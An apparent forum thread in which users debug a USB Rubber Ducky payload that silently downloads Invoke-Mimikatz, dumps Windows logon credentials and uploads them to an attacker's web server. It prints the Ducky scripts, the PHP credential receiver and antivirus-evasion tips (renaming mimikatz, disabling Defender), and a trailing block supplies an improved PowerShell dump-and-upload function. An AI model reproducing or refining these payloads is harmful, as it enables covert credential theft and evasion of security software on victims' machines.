Posted

Hello everyone.

For a few days I have been trying to run my first payload, following the purchase of the USB Rubber Ducky... but it doesn't work ;-(

In my inject.bin file, I have this:

 

REM Open the Run dialog and launch an elevated cmd (this triggers a UAC prompt)
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
REM Answer the UAC prompt, then type the download-and-exfiltrate one-liner into the elevated cmd window
DELAY 2000
ALT y
DELAY 1000
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)"&exit
ENTER

NB: I can give the exact URL of my hosting by private message.

I transferred both files to my server with FileZilla: im.ps1 (download here: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 <-- I haven't changed it) and rx.php.

In rx.php I have this code :

<?php
// One file per POST, named after the client IP and the server's local time.
// The path is relative to this script's directory, so in a normal web root
// the captured file is itself downloadable over HTTP by anyone who guesses the name.
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
// Raw request body; an empty POST body still creates an empty file.
file_put_contents($file, file_get_contents("php://input"));
?>


When I insert the USB key, the script apparently executes without error... But no file is created on my hosting ;-(

I reread the whole script ... but I do not understand why it doesn't work ;-(

Can you help me ?

Thanks all ;-)

 

NB: I live in France, in Paris and in Normandy (Cabourg). If you pass through there, I can offer you a drink ;-)

 

Posted
5 hours ago, mavieprivee said:

In addition to my previous message:

I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds

With no data ;-(

1 - Your Rubber Ducky script is out of order. You're deleting the run history and then running the script, which is somewhat counterproductive, as your last command would still remain. Delete the run history after running the script.

2 - Open PS as admin and run the code below in the window, and see what the output says. An empty file indicates that the content of the variable is being sent from PS to the web server, but there's no content. This would lead me to believe that there's an issue either downloading or running mimikatz.

IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)
Posted
On 1/14/2017 at 3:08 PM, henna3 said:

I have a quick little problem. The code and everything runs perfectly fine. My problem is that when the UAC prompt comes up, it comes up as a non-active window. So, when ALT+y is pressed, it's not being pressed in the UAC prompt window. Is there any way to fix this issue or work around it?

Amazing twin duck payload!

Thanks.

Did you find a solution? I am running into the same thing, and even if I choose to run the UAC prompt I am not getting a file, so...

Posted

Well, it looks like Win10 is now blocking scripts. It could be because I am running Win 10 Enterprise.

 

PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
.\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module  ...
+ ~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess 

Posted
6 hours ago, shr00mie said:

1 - Your Rubber Ducky script is out of order. You're deleting the run history and then running the script, which is somewhat counterproductive, as your last command would still remain. Delete the run history after running the script.

2 - Open PS as admin and run the code below in the window, and see what the output says. An empty file indicates that the content of the variable is being sent from PS to the web server, but there's no content. This would lead me to believe that there's an issue either downloading or running mimikatz.


IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

 

Hello shr00mie,

When I run just the line

IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

in a .ps1 file, I obtain a file on my server with this :

 


  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

 

;-(

Posted
On 13/2/2017 at 3:58 AM, shr00mie said:

1 - Your Rubber Ducky script is out of order. You're deleting the run history and then running the script, which is somewhat counterproductive, as your last command would still remain. Delete the run history after running the script.

2 - Open PS as admin and run the code below in the window, and see what the output says. An empty file indicates that the content of the variable is being sent from PS to the web server, but there's no content. This would lead me to believe that there's an issue either downloading or running mimikatz.


IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

 

His script is not out of order; it is in fact exactly the new version introduced in this very useful post from the OP.
The history cleaning is performed only when the powershell process shuts down/exits. ;)

 

On 13/2/2017 at 6:49 AM, L07TB0Y said:

Well, it looks like Win10 is now blocking scripts. It could be because I am running Win 10 Enterprise.

 

PS E:\> .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\im.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\%computername%_creds.txt';"
.\im.ps1 : File E:\im.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\im.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module  ...
+ ~~~~~~~~
    + CategoryInfo          : SecurityError: (:) [], PSSecurityException
    + FullyQualifiedErrorId : UnauthorizedAccess 

For your info, many AVs, including Windows Defender, are now able to detect the invoke-mimikatz.ps1 script.
But never trust your AV too much, as there is always an easy workaround ;)
Check this post for detailed instructions:
http://www.blackhillsinfosec.com/?p=5555

Basically you just need to modify the original invoke-mimikatz.ps1 script, substituting every "mimikatz" word with another one (mimidogz?).

I've also found an alternate and lighter version (400K vs 2.5MB) of the original invoke-mimikatz script that is not detected either, but with this one you need to type the commands interactively: there is no -DumpCreds switch.

Here:
https://gist.github.com/subTee/0a3b56ac743e8d1eeab0

I've already tested both and they work like a charm, until a future 'cheap' AV update... ;)

Posted

I forgot to mention that the minimum number of columns for a PowerShell window is now 20. No longer 18, or it will not shrink.

P.S.
Is there a way to edit a post after posting it?! I cannot find it.

Posted

Hello everybody,
you can get my modified invoke-mimikatz.ps1 (renamed md.ps1) from this link:

https://goo.gl/FoLS0P

While this is the Duck script:

REM Open the Run dialog and launch an elevated cmd (this triggers a UAC prompt)
DELAY 1000
GUI r
DELAY 300
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=20&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
ENTER
DELAY 500
REM Answer the UAC prompt with LEFTARROW + ENTER instead of ALT y
REM ALT y
LEFTARROW
DELAY 300
ENTER
DELAY 300
REM Type the download-and-exfiltrate one-liner into the elevated cmd window (md.ps1 exports Invoke-Mimidogz)
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://your.domain/md.ps1'); $o = Invoke-Mimidogz -DumpCred; (New-Object Net.WebClient).UploadString('https://your.domain/rx.php', $o)"&exit
ENTER

And this is the rx.php file content, you need to put on your server to receive the credentials:

<?php
// Fix the timezone so date() does not warn and the filenames are consistent.
date_default_timezone_set('Europe/Rome');
// One file per POST, named after the client IP and the server's local time.
// The path is relative to this script's directory, so in a normal web root
// the captured file is itself downloadable over HTTP by anyone who guesses the name.
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".txt";
// Raw request body; an empty POST body still creates an empty file.
file_put_contents($file, file_get_contents("php://input"));
?>
  • 4 weeks later...
Posted

Hello Sh4d0wm4n,

Your script is great, thank you! But, unfortunately, the link to your modified invoke-mimikatz.ps1 (renamed md.ps1) isn't available anymore... Could you please upload it again? Thanks a lot!

  • 3 weeks later...
Posted

I am getting the following error. The web server does create the file, however the contents are blank. Here is what is shown when running the command. Anyone else run into this?

 

C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
New-Object :
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:85
+ ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
+                                                                            ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

 


C:\WINDOWS\system32>

Posted
1 hour ago, MS08067 said:

I am getting the following error. The web server does create the file, however the contents are blank. Here is what is shown when running the command. Anyone else run into this?

 

C:\WINDOWS\system32>powershell "IEX (New-Object Net.WebClient).DownloadString('http://XXXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://XXXXXXXXX/rx.php',$output)"
New-Object :
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:85
+ ... dString('http://XXXXXXXX/im.ps1');$output=Invoke-Mimikatz -DumpCr ...
+                                                                            ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

 


C:\WINDOWS\system32>

I figured out what's going on here. Windows Defender was catching it and removing it before it was able to be run. Once I disabled it, it then worked just fine. Now the question is, should we automate turning Windows Defender off as a service (since we are administrator), or do we try to obfuscate the file so it's not detected?
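The function below is an added example written for this page; it is not code from any of the posts above and not part of PowerSploit or mimikatz. It turns the thread's one-liner into a version that reports which of the failure modes discussed in this thread actually occurred instead of uploading whatever $o holds. The original one-liner never checks that the download succeeded, that the function got defined, or that the output is non-empty, so UploadString with a null $o produces exactly the empty file the OP and MS08067 saw. Two error codes from the posts are worth decoding: 0x00000005 in "Handle on memory" is ERROR_ACCESS_DENIED (the process is not elevated, or LSASS runs as a protected process), and 80010106 from CoInitializeEx is RPC_E_CHANGED_MODE, a harmless COM apartment-mode mismatch that does not stop the dump. Assumptions: the two URLs are placeholders, the default function name is the one exported by the PowerSploit script (pass the renamed one, e.g. Invoke-Mimidogz, if you renamed it), and Get-MpComputerStatus assumes the Windows Defender PowerShell module is present (Windows 8.1/10 and later).

```powershell
# Added example, not code from the original posts. Checked version of the
# thread's "IEX(DownloadString); $o = Invoke-Mimikatz -DumpCreds; UploadString" one-liner.

function Test-IsElevated {
    # sekurlsa::logonpasswords opens a handle on LSASS, which needs an elevated token;
    # "Handle on memory (0x00000005)" in the thread is ERROR_ACCESS_DENIED.
    $id = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($id)
    return $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}

function Get-RealTimeProtectionState {
    # $true/$false, or $null when the Defender module is not available (assumption: Win 8.1+/10).
    try {
        return (Get-MpComputerStatus -ErrorAction Stop).RealTimeProtectionEnabled
    } catch {
        return $null
    }
}

function Invoke-CheckedCredDump {
    param(
        [Parameter(Mandatory)][string]$ScriptUrl,     # placeholder, e.g. https://your.domain/im.ps1
        [Parameter(Mandatory)][string]$UploadUrl,     # placeholder, e.g. https://your.domain/rx.php
        [string]$FunctionName = 'Invoke-Mimikatz'     # name exported by the downloaded script
    )
    $r = [ordered]@{
        Elevated           = Test-IsElevated
        RealTimeProtection = Get-RealTimeProtectionState
        FunctionLoaded     = $false
        OutputBytes        = 0
        Uploaded           = $false
        Error              = $null
    }

    if (-not $r.Elevated) {
        $r.Error = 'Not elevated: mimikatz cannot open LSASS (expect 0x00000005).'
        return [pscustomobject]$r
    }

    $wc = New-Object Net.WebClient
    try {
        $src = $wc.DownloadString($ScriptUrl)
        if ([string]::IsNullOrWhiteSpace($src)) { throw "empty response from $ScriptUrl" }
        # Dot-source the downloaded text so the function is defined in this scope.
        # A script blocked by AMSI/Defender usually fails right here, not later.
        . ([scriptblock]::Create($src))
    } catch {
        $r.Error = "Download/load failed: $($_.Exception.Message)"
        return [pscustomobject]$r
    }

    $r.FunctionLoaded = [bool](Get-Command $FunctionName -ErrorAction SilentlyContinue)
    if (-not $r.FunctionLoaded) {
        # This is the "not recognized as the name of a cmdlet" case from the thread.
        $r.Error = "$FunctionName is not defined after loading $ScriptUrl (wrong file, renamed function, or script removed by AV)."
        return [pscustomobject]$r
    }

    # Merge the error stream into the output so a failed dump is still recorded.
    $o = (& $FunctionName -DumpCreds 2>&1 | Out-String).Trim()
    $r.OutputBytes = [Text.Encoding]::UTF8.GetByteCount($o)
    if ($o -match 'kuhl_m_sekurlsa_acquireLSA') {
        $r.Error = 'mimikatz could not open LSASS: check elevation and LSA protection (RunAsPPL).'
    }

    if ($r.OutputBytes -eq 0) {
        if (-not $r.Error) { $r.Error = 'Dump returned nothing; not uploading an empty body.' }
        return [pscustomobject]$r
    }
    try {
        $null = $wc.UploadString($UploadUrl, $o)
        $r.Uploaded = $true
    } catch {
        $r.Error = "Upload failed: $($_.Exception.Message)"
    }
    return [pscustomobject]$r
}

# Usage (placeholder URLs): run from an elevated PowerShell and read the status object.
Invoke-CheckedCredDump -ScriptUrl 'https://your.domain/im.ps1' -UploadUrl 'https://your.domain/rx.php' | Format-List
```

Run it once by hand in a visible, elevated window before putting it behind -W Hidden on the Duck: the status object tells you in one glance whether the problem is elevation, the download, the function name, LSASS access, or the upload, which is the distinction the empty .creds file cannot give you.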
